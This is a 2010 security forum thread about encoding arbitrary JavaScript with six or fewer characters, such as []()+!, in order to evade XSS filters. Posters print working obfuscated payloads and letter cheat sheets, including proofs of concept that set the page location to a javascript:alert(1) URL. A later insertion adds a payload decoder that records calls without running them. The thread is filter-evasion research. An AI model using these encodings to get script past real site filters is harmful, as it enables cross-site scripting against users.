Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 15, 2010 10:13PM

It's not over yet :) More later...

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 15, 2010 11:10PM



--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 16, 2010 01:34PM

6 is the wall I doubt it can be beaten

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 16, 2010 07:30PM

haha David and I reached the same conclusion, unless he is talking about another browser.. (maybe chrome?) but who knows..

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 08:22AM

I am close to giving up on 5 - although all that is needed is an s made out of []/_+ and we'd be there ;)

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 19, 2010 09:37AM

haha the great js wall has you beat. I don't think it can be done. What chars can you currently get?

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 09:46AM

NaN, Infinity, any digit, undefined etc.. I was trying to get an s to get hands on isNaN() to get the rest of the necessary characters - to then access []['__parent__']['location'] - so the s is actually the last character from stopping us to get it running with 5 :P Or an r+l - to access [].filter again...

Anyway haha - 6 seems to be it :)



Edited 1 time(s). Last edit at 01/19/2010 09:50AM by .mario.

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 19, 2010 09:50AM

Hmmmmmmmm let's say you had an "s" or "r", how would you do an assignment or function call with () or = ?

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 10:00AM

Yep that's right - almost no way :) Bloody underscore!

Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 19, 2010 08:24PM

the JS GREAT WALL!! 6 is a perfect number as david mentioned, so.. it's perfect!

Greetz!!

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 05, 2010 11:18AM

6 chars: []()+!
Length: 2130 chars

Full PoC: http://pastebin.com/f5d8bc217

Code execution: []['filter']['constructor']('eval(name)')()

Cheat sheet:

true: !+[]
false: ![]
undefined: [][[]]
0: +[]
1: +!+[]
2: !+[]+!+[]
10: +!+[]+[+[]]
f: "false"[0] (![]+[])[+[]]
i: "falseundefined"[10] ([![]]+[][[]])[+!+[]+[+[]]]
l: "false"[2] (![]+[])[!+[]+!+[]]
t: "true"[0] (!+[]+[])[+[]]
e: "true"[3] (!+[]+[])[!+[]+!+[]+!+[]]
r: "true"[1] (!+[]+[])[+!+[]]
c: "function"[3] ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
o: "truefunction"[10] (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
n: "undefined"[1] ([][[]]+[])[+!+[]]
s: "false"[3] (![]+[])[!+[]+!+[]+!+[]]
u: "undefined"[0] ([][[]]+[])[+[]]
v: "0function filter() {.....[native"[30] (+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+!+[]+[+[]]]
a: "false"[1] (![]+[])[+!+[]]
m: ((+[])['constructor']+[])[11] ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!+[]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
(: (![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+[+[]]]
): (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+[+[]]]

LeverOne



Edited 2 time(s). Last edit at 02/05/2010 05:18PM by LeverOne.

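As an added example (my own code, not LeverOne's PoC and not from the thread): a small evaluator for the []()+! subset that parses the expression grammar the cheat sheet above relies on and recovers the strings a payload spells out, but records and refuses every function call instead of running it, which is what you want when triaging such a payload from a log. The names jsfEval, calledWith, Unexecuted, L, FILTER, CONSTRUCTOR and SAMPLE are mine; the sample payload is constructed from the cheat-sheet entries above.

```javascript
// Added example, not from the thread. Evaluates the []()+! expression subset using the
// host engine's own coercion rules, but never invokes anything: each call site is
// recorded as an Unexecuted marker so a payload can be inspected rather than run.
// Names (jsfEval, calledWith, Unexecuted, L, FILTER, CONSTRUCTOR, SAMPLE) are my own.

class Unexecuted {
  constructor(callee, args) { this.callee = callee; this.args = args; }
  toString() { return "[unexecuted call]"; }
}

// Recursive-descent parser/evaluator for: []  [x]  (x)  x[y]  x(y)  !x  +x  x+y
function jsfEval(src) {
  const calls = [];
  let i = 0;
  const peek = () => src[i];
  const eat = (ch) => {
    if (src[i] !== ch) throw new SyntaxError(`expected '${ch}' at offset ${i}`);
    i++;
  };
  function primary() {
    if (peek() === "[") {                       // array literal with zero or one element
      eat("[");
      if (peek() === "]") { eat("]"); return []; }
      const v = additive(); eat("]"); return [v];
    }
    if (peek() === "(") { eat("("); const v = additive(); eat(")"); return v; }
    throw new SyntaxError(`unexpected '${peek()}' at offset ${i}`);
  }
  function postfix() {
    let v = primary();
    for (;;) {
      if (peek() === "[") {                     // property read on built-ins: no code runs
        eat("["); const k = additive(); eat("]");
        v = v[String(k)];
      } else if (peek() === "(") {              // call site: recorded, never executed
        eat("(");
        const args = peek() === ")" ? [] : [additive()];
        eat(")");
        v = new Unexecuted(v, args);
        calls.push(v);
      } else return v;
    }
  }
  function unary() {
    if (peek() === "!") { eat("!"); return !unary(); }
    if (peek() === "+") { eat("+"); return +unary(); }
    return postfix();
  }
  function additive() {
    let v = unary();
    while (peek() === "+") { eat("+"); v = v + unary(); }
    return v;
  }
  const value = additive();
  if (i !== src.length) throw new SyntaxError(`trailing input at offset ${i}`);
  return { value, calls };
}

// Readable summary of every call a payload would have made, in order.
function calledWith(src) {
  return jsfEval(src).calls.map(c => ({ callee: String(c.callee), args: c.args.map(String) }));
}

// Letters exactly as the thread's cheat sheet spells them.
const L = {
  f: "(![]+[])[+[]]",             i: "([![]]+[][[]])[+!+[]+[+[]]]",
  l: "(![]+[])[!+[]+!+[]]",       t: "(!+[]+[])[+[]]",
  e: "(!+[]+[])[!+[]+!+[]+!+[]]", r: "(!+[]+[])[+!+[]]",
  n: "([][[]]+[])[+!+[]]",        s: "(![]+[])[!+[]+!+[]+!+[]]",
  u: "([][[]]+[])[+[]]",
};
const FILTER = [..."filter"].map(ch => L[ch]).join("+");
L.c = `([][${FILTER}]+[])[!+[]+!+[]+!+[]]`;     // "function filter() ..."[3]
L.o = `(!+[]+[][${FILTER}])[+!+[]+[+[]]]`;      // "truefunction filter() ..."[10]
const CONSTRUCTOR = [..."constructor"].map(ch => L[ch]).join("+");
// Constructed sample in the thread's [][filter][constructor](code)() shape, with "f" as the code.
const SAMPLE = `[][${FILTER}][${CONSTRUCTOR}](${L.f})()`;

console.log(jsfEval(L.i).value, jsfEval(L.c).value, jsfEval(L.o).value);  // i c o
console.log(calledWith(SAMPLE));  // [0]: Function constructor with args ["f"]; [1]: call on that unexecuted result
```

Native function source text differs between engines: the thread's v at index 30 ("{.....[native") relies on the multi-line form Firefox used in 2010, so on V8 that entry resolves to a different character, which is why a decoder should take String() from the engine it targets rather than from a hard-coded table.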
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 06, 2010 02:52AM

Could someone explain what's going on here? I'm kinda lost...

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 06, 2010 02:59AM

We are trying to find the smallest subset of characters needed to run arbitrary JS code.

As far as we know, there are different 6-char subsets, so now we are trying to find the one that requires the fewest characters.

LeverOne is awesome haha he is already winning our diminutive contest.




Edited 2 time(s). Last edit at 02/06/2010 03:00AM by sirdarckcat.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 06, 2010 11:30AM

I looked at his PoC. Am I right in saying that it's basically doing eval(name)? So how come we need []['filter']['constructor']('eval(name)')()?

Also, is there any practical use in this? Or is it just a fun contest? =P

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 06, 2010 06:41PM

eval(name) uses 8 chars:

ealmnv()

this other one uses 6 chars:

[]()+!

these are useful for evasion and obfuscation of XSS filters.. as well as.. fun!

the non-alnum contest actually was capable of bypassing FBJS sandbox.. and this contest started from a real life requirement for the exploitation of a bug.. so yeah, it's useful AND fun!

Greetings!!




Edited 1 time(s). Last edit at 02/06/2010 07:41PM by sirdarckcat.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 07, 2010 04:15AM

Ok, I read one of the posts in the previous thread so I'm beginning to understand how the strings are constructed. Gee how does anyone figure out that ![] gives you false?

I can't seem to get undefined printed when I do javascript:[][[]], am I missing something? Also is there a reason why we're doing eval(name)? Wouldn't something like eval(a) save some chars? Also, I don't really understand why we have to do []['filter']['constructor']('eval(name)')() just to get to the eval function.

Hah, now I feel noob-ish.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 07, 2010 05:45AM

javascript:[][[]]+[]
should get u undefined..

and name is referring to window.name, check the other threads in this board to understand why we do it that way

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 08, 2010 07:41PM

Yep, understood the window.name part. I think this section is a bit above me right now...

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 09, 2010 01:40AM

Hi guys.

I've spent a few hours on this now, and I don't think it's possible to ditch the ! or == operators unless we find some obscure place to get letters. P.S. there should probably be a thread, "where to get letters with javascript". I think you could get them all by going into window.document and getting stuff, which would be EXTREMELY LONG, I wonder if there are any places we're missing.



Edited 1 time(s). Last edit at 02/09/2010 01:41AM by SW.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 09, 2010 04:42AM

>>> We are trying to find the smallest subset of characters needed to run arbitrary JS code.

This might not be exactly on topic of eval(name) or whatever the original idea was, but I have String.fromCharCode() in ~3900 characters. Now we can run truly arbitrary code, since we have all the letters. With another 2100 to call it, that would be 6000 characters baseline, after which you can input an arbitrary string at [relatively] cheap cost (something like 10-20 more per letter). Think it's still practically useful? :D

I won't repeat the part that LeverOne posted (though I think my 'm' might be a bit shorter), but here it is.

String.fromCharCode():
((![]+[])[+[]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+!+[]+!+[]+[+!+[]]))[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+
[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+[])+([][[]]+[][[]]+[])[+[]])[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])((![]+[])[+!+[]]+([][[]]+[][[]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+[])+([][[]]+[][[]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]+!+[]]+([][[]]+[])[+!+[]+!+[]+!+[]]]

I don't know much about Hackvertor, is there any way to convert a string into no alnum char codes with it?

Each 'm', 'h', 'C' cost ~680 characters but I am now certain that you can create every letter or character if you have enough space, by using atob, but it's surprisingly nasty to access that function (not to mention making reverse encodings!). You have to access Window twice, once to get 'b', and then for the call.

PS - Thanks to this thread I will forever have the image [+[]] burned into my memory when I think of 0.



Edited 4 time(s). Last edit at 02/09/2010 05:11AM by SW.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: February 09, 2010 05:16AM

Quote

SW Wrote:
> I don't know much about Hackvertor, is there any
> way to convert a string into no alnum char codes
> with it?

Yeah it's possible but in the old style:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wKCKqwMHCw8TGyMnKy8zNzs%2FQ0dLT1NXW2Nna29zd3t%2Fg4eLj5OXm5%2Bjp6uvs7e7v8PHy8%2FT19vj5%2Bvv8%2Ff4kXyIpPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

I plan to add non-alpha string generators and non-alpha encode/decode in future though. Maybe in the next version

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 09, 2010 09:54AM

@SW, yeah.. the reason we concluded 6 is the JS Great Wall is because:
Unvariable: []+

And then we have two options:

Execution via function call: ()
we need truefalse, total = 6

Execution via assignment: =
we need a reference to window, or /_, total = 6


if we find a way to get property method using undefinedInfinity then we break the wall.
if we find a way to get a reference to window with only: []+= and any other char, then we break the wall.


but since we failed to do that, then that's why we called it JS Great Wall..

Greetings!!

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 09, 2010 11:13PM

6 chars: _/=+[] (optimal set)
Length: 503 chars

Code execution: []['__parent__']['location']=[]['__parent__']['name']

PoC:

name='javascript:alert(1)';

[___=[[_=[]]==_]+_[_]][______=[______=/__/[___[++_+_+_]+[_____=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_+_]]+__[_+_/_]+__[_/_]+[____=____[_]]+__[_]]]+[/_/[_______=____+_____+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+____+__[+[]]+_____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[+[]]+______][___[_/_+_/_]+_____+____+___[_/_]+__[+[]]+___[_/_+[+[]]]+_____+___[_+_]]=[][______][___[_+_]+___[_/_]+[[_][+[]][_______]+_][+[]][_/_+[_/_]]+__[_]]

Cheat sheet:

NaN +/_/
false: []==[]
true: +[]==[]
undefined: [][[]]

_: numeric
__: "trueundefined"
___: "falseundefined"
____: filter, c
_____: o
______: __, __parent__
_______: constructor

init1: ___=[[_=[]]==_]+_[_]
init2: __=[_==_]+_[_]
s: "falseundefined"[3] ___[++_+_+_]
f: "falseundefined"[0] ___[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
l: "falseundefined"[2] ___[++_]
t: "trueundefined"[0] __[+[]]
e: "trueundefined"[3] __[++_]
r: "trueundefined"[1] __[_/_]
o: "function"[6] _____=[____=[]['filter']+_][+[]][_+_]
u: "trueundefined"[4] __[_+_/_]
r: "trueundefined"[1] __[_/_]
c: "function"[3] ____=____[_]
e: "trueundefined"[3] __[_]
c: "function"[3] ____
o: "function"[6] _____
n: "falseundefined"[6] ___[_+_]
s: "falseundefined"[3] ___[_]
t: "trueundefined"[0] __[+[]]
r: "trueundefined"[1] __[_/_]
u: "trueundefined"[4] __[++_]
c: "function"[3] ____
t: "trueundefined"[0] __[+[]]
o: "function"[6] _____
r: "trueundefined"[1] __[_/_]
p: "function RegExp"[14] [/_/['constructor']+_][+[]][_/_+[_]]
a: "falseundefined"[1] ___[_=_/_]
r: "trueundefined"[1] __[_++]
e: "trueundefined"[3] __[++_]
n: "falseundefined"[6] ___[_+_]
t: "trueundefined"[0] __[+[]]
l: "falseundefined"[2] ___[_/_+_/_]
o: "function"[6] _____
c: "function"[3] ____
a: "falseundefined"[1] ___[_/_]
t: "trueundefined"[0] __[+[]]
i: "falseundefined"[10] ___[_/_+[+[]]]
o: "function"[6] _____
n: "falseundefined"[6] ___[_+_]
n: "falseundefined"[6] ___[_+_]
a: "falseundefined"[1] ___[_/_]
m: "function Number"[11] [[_][+[]][_______]+_][+[]][_/_+[_/_]]
e: "trueundefined"[3] __[_]


LeverOne



Edited 3 time(s). Last edit at 02/25/2010 08:09AM by LeverOne.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 10, 2010 01:24AM

Very very nice job! Intense...!



Edited 1 time(s). Last edit at 02/10/2010 01:32AM by SW.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 10, 2010 05:23AM

LeverOne you rock =) haha

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: thornmaker
Date: February 10, 2010 08:38AM

good stuff. i've been waiting for someone to start minimizing with variable assignments. 503 is awesome

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 25, 2010 08:16AM

Length: 460 chars

PoC:
name='javascript:alert(1)';

[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+ ___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]

Cheat sheet:

_: numeric
__: "/_/", "trueundefined", "function Number"
___: "falseundefined"
____: "function", o
_____: __, __parent__
______: c
_______: constructor


init1: "falseundefined" ___=[[_=[]]==_]+_[_]

init2: "/_/" __=/_/+_ <-- change

init3: "trueundefined" __=[_==_]+_[_]

__: __[++_]+__[_]

f: "falseundefined"[0] ___[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
l: "falseundefined"[2] ___[++_]
t: "trueundefined"[0] __[+[]]
e: "trueundefined"[3] __[++_]
r: "trueundefined"[1] __[_/_]

c: "function"[3] [[]['filter']+_][+[]][_]
o: "function"[6] ____[_+_]
n: "falseundefined"[6] ___[_+_]
s: "falseundefined"[3] ___[_]
t: "trueundefined"[0] __[+[]]
r: "trueundefined"[1] __[_/_]
u: "trueundefined"[4] __[++_]
c: "function"[3] ______
t: "trueundefined"[0] __[+[]]
o: "function"[6] ____
r: "trueundefined"[1] __[_/_]

p: "function RegExp"[14] [/_/['constructor']+_][+[]][_/_+[_]]
a: "falseundefined"[1] ___[_=_/_]
r: "trueundefined"[1] __[_++]
e: "trueundefined"[3] __[++_]
n: "falseundefined"[6] ___[_+_]
t: "trueundefined"[0] __[_=+[]]

l: "falseundefined"[2] ___[++_+_]
o: "function"[6] ____
c: "function"[3] ______
a: "falseundefined"[1] ___[_]
t: "trueundefined"[0] __[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
o: "function"[6] ____
n: "falseundefined"[6] ___[++_+_+_]

init4: "function Number" __=_[_______]+_

n: "function Number"[2] __[_]
a: "falseundefined"[1] ___[_/_]
m: "function Number"[11] __[_/_+[_/_]]
e: "falseundefined"[4] ___[_+_]



Note! The __parent__ property is obsolete in Gecko 1.9.3 and does not work on FF3.7a5, FF4.0b1: https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/Object

#goodbye


LeverOne



Edited 4 time(s). Last edit at 07/13/2010 02:01PM by LeverOne.

Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: July 13, 2010 10:53AM

=[]+

NaN:+[][+[]]

undefined:[][+[]]

false:[]==[]

true:+[]==+[]

f:[[[]==[]]+[]][+[]][+[]]

i:[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]

l:[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]

t:[[+[]==+[]]+[]][+[]][+[]]

e:[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]

r:[[+[]==+[]]+[]][+[]][++[+[]][+[]]]

function filter(){[native code]}:[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]

o:[[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]+[]][+[]][++[++[++[++[++[++[+[]][+[]]][+[]]][+[]]][+[]]][+[]]][+[]]]

